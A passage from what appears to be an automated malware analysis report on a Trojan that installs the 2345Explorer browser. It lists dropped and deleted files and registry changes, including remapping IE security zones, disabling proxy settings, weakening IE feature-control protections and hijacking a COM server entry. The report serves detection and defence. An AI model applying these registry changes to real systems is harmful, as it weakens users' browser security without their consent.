%Program Files%\2345Soft\2345Explorer\Config\Users\Default\SystemUrl.data (5520 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\fancybox\jquery.fancybox-1.3.4.css (8 bytes)
%Program Files%\2345Soft\2345Explorer\Skins\Coral.dui (784 bytes)
%Program Files%\2345Soft\2345Explorer\Skins\Coral.xml (5064 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\gradient_bg.png (246 bytes)
%Program Files%\2345Soft\2345Explorer\UserCenter\images\lg_retry.png (13 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\bgrx.jpg (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\home\game_big.jpg (12 bytes)
%Program Files%\2345Soft\2345Explorer\CoralExtract.dll (1712 bytes)
%Program Files%\2345Soft\2345Explorer\Uninstall.exe (3700 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_02.jpg (4992 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\3D6A8AC8F2013B0D7A1EA53076E96320.ico (2 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_item2.png (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_vyouku.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\UserCenter\images\yzm.png (1 bytes)
%Program Files%\2345Soft\2345Explorer\UserCenter\regRetry.htm (927 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\icon_music.png (4 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\home\sohu_big.jpg (15 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\home\dongman_big.jpg (13 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\wico_2345.gif (358 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_vyouku.png (784 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_item_loading.gif (4 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_vgoogle.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\6E086A7049DD129DF69051413AC6AB3A.ico (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_edit_bg.gif (2 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\wico_sina.gif (628 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_item2_hover1.png (2 bytes)
%Program Files%\2345Soft\2345Explorer\CoralHtmlWnd.dll (1733 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp\modern-header.bmp (9 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_bg2.png (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_vsoso.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_02_1366.jpg (2392 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_dbaidu.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\home.ico (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_youdao.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_tit_hover.gif (737 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_item_add.jpg (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_wsoso.png (13 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\3D6A8AC8F2013B0D7A1EA53076E96320.ico.jpg (768 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_baidu.png (4 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\8FDEAD446A8D607C20207D38D669E349.ico.jpg (738 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\F2A7BED2A1035F9E4EC022B3ECA481A8.ico.jpg (805 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\icon_inquiry.png (4 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\index.htm (784 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_dgoogle.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\DA3E6E24050AA14E8FD334F6DA0AE9F1.ico.jpg (776 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\wico_163.gif (82 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\pie\pie.htc (1552 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_gjyjo.png (784 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\icon_novel.png (6 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_xshooter.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\home\weibo_big.jpg (14 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_button2.gif (886 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\1860F34853BBC50F66BF81B679989830.ico (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\error\btn.jpg (5 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\recovery.htm (2 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\js\move.js (11 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_xl_background2.gif (472 bytes)
%Program Files%\2345Soft\2345Explorer\UserCenter\images\sign_btnbg_h.png (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_baidu.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_03.jpg (5064 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_msoso.png (14 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\recovery.ico (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_bigicon_soso.png (6 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\dd_dot.png (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\ico_ie.gif (634 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp\FileInfo.dll (3312 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\F2A7BED2A1035F9E4EC022B3ECA481A8.ico (318 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\home\tv_big.jpg (14 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\icon_game.png (6 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\loading.gif (771 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_gjyjo.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\css\jquery.loadmask.css (846 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_vgoogle.png (784 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_sogou.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_icon2.gif (2 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_preview_but2.gif (637 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_ibaidu.png (5 bytes)
%Program Files%\2345Soft\2345Explorer\Config\MobileScanner.png (7 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_bar_remove.gif (590 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_pre_01.bmp (784 bytes)
%Program Files%\2345Soft\2345Explorer\Coral.dll (12288 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search_baidu.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\add_bg.png (839 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_content_error.jpg (11 bytes)
%Program Files%\2345Soft\2345Explorer\Config\Users\Default\head_default.png (4 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_wbaidu.png (4 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\icon_movie.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\grid_load.png (1 bytes)
%Program Files%\2345Soft\2345Explorer\Skins\Coral.skn (25824 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_xxunlei.png (11 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\private.ico (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_xverycd.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_pre_04.bmp (784 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\3D6A8AC8F2013B0D7A1EA53076E96320.ico (2 bytes)
%Program Files%\2345Soft\2345Explorer\UserCenter\images\sign_delbtn.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\home.ico (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_bar_remove2.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_grid_item1.png (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\gradient_bottom.png (2 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_edit_bg2.gif (718 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\85131C29C8F7B398A345BD7F1A51DAB1.ico.jpg (768 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\incognito.htm (2 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_edit_background2.gif (769 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_01.jpg (4992 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\icon_goods.png (4 bytes)
%Program Files%\2345Soft\2345Explorer\msvcr80.dll (3699 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\taskmanager.ico (1 bytes)
%Program Files%\2345Soft\2345Explorer\UserCenter\css\sign.css (4 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\switch_widbar_icon2.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_Default.jpg (2392 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\main_search_bigicon_baidu.png (6 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\home\game.2345.com.jpg (13 bytes)
%Program Files%\2345Soft\2345Explorer\Config\Install.data (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\js\coral_lib_min.js (2392 bytes)
%Program Files%\2345Soft\2345Explorer\UserCenter\images\sign_dropbtn.png (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\ico_sogo.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\Config\Users\Default\login_head_default.png (4 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\guide_ie.gif (271 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\DA3E6E24050AA14E8FD334F6DA0AE9F1.ico (318 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\iconBg.png (4 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_gtaobao.png (12 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_msoso.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_vbaidu.png (4 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_gdangdang.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\home\book_big.jpg (784 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\error\404_1.jpg (8 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\add_hover.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\close_tab.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp (4 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_preview_but.gif (684 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_vsoso.png (14 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main.jpg (1552 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_none.png (186 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\hot.png (255 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\6E086A7049DD129DF69051413AC6AB3A.ico.jpg (764 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\incognito\main_search_bg2.png (1 bytes)
%Program Files%\2345Soft\2345Explorer\Config\FavIcon\1860F34853BBC50F66BF81B679989830.ico.jpg (778 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_gpaipai.png (7 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\popup_dialog_list_button.gif (1 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\Wallpaper_pre_Default.bmp (784 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_logo_xshooter.png (784 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\home\fenghuang_big.jpg (12 bytes)
%Documents and Settings%\%current user%\Application Data\2345Explorer\FavIcon\F2A7BED2A1035F9E4EC022B3ECA481A8.ico.jpg (805 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\search\main_search_icon_xduote.png (3 bytes)
%Program Files%\2345Soft\2345Explorer\StartPage\images\home\baidu_big.jpg (11 bytes)
%Program Files%\2345Soft\2345Explorer\2345Explorer.exe (418 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp\RCWidgetPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp\modern-header.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp\FileInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp (0 bytes)
%Program Files%\2345Soft\2345Explorer\2345Explorer.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (0 bytes)

Registry activity

The process ³ÉÆ·.exe:1980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 22 56 39 E3 E3 93 E1 AC 4A 74 6A BE FD 02 AE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The process %original file name%.exe:1152 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015072020150721]
"CacheRepair" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015072020150721]
"CachePrefix" = ":2015072020150721:"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015072020150721]
"CacheLimit" = "8192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015072020150721]
"CacheOptions" = "11"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF AC 8D 9C 5F D8 3A 7E 9E D5 CA E0 39 7B 39 1E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015072020150721]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012015072020150721\"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140318]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 2345Explorer.exe:2100 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 1F E6 A0 6C BC F0 C2 F7 A5 E8 EA E2 E0 FB BD"

[HKLM\SOFTWARE\2345Explorer]
"Value5" = "false"

The process 2345Explorer.exe:304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_GPU_RENDERING]
"2345Explorer.exe" = "0"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP]
"2345Explorer.exe" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION]
"2345Explorer.exe" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_SCRIPT_PASTE_URLACTION_IF_PROMPT]
"2345Explorer.exe" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INTERNET_SHELL_FOLDERS]
"2345Explorer.exe" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"SecureProtocols" = "168"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_REQUIRE_VALID_MAILTO_APP_PPROTOCOL_REGISTRATION_KB941193]
"2345Explorer.exe" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Disable Script Debugger" = "yes"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER]
"2345Explorer.exe" = "6"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER]
"2345Explorer.exe" = "6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN]
"2345Explorer.exe" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\2345Explorer]
"Value5" = "false"
"Value2" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 79 82 41 CF B6 EC 7B 80 65 A6 5E 83 D6 BD E4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The process 2345Explorer.exe:2108 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 86 05 A9 74 E9 16 80 CD C4 0A 9C F7 BA BD 7A"

The process 2345Explorer.exe:2072 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 F0 8E 8B 9B 51 7D B0 C9 0C 41 3B C7 B3 E0 C6"

The process 2345Explorer.exe:2364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 4E A8 05 54 35 BF BA 38 C3 1A 59 AC 83 AD 0A"

The process 2345Explorer.exe:2116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32]
"(Default)" = "%Program Files%\2345Soft\2345Explorer\2345Explorer.exe"

[HKCU\Software\Clients\StartMenuInternet\2345Explorer.exe\Capabilities]
"ApplicationDescription" = "2345王牌浏览器"

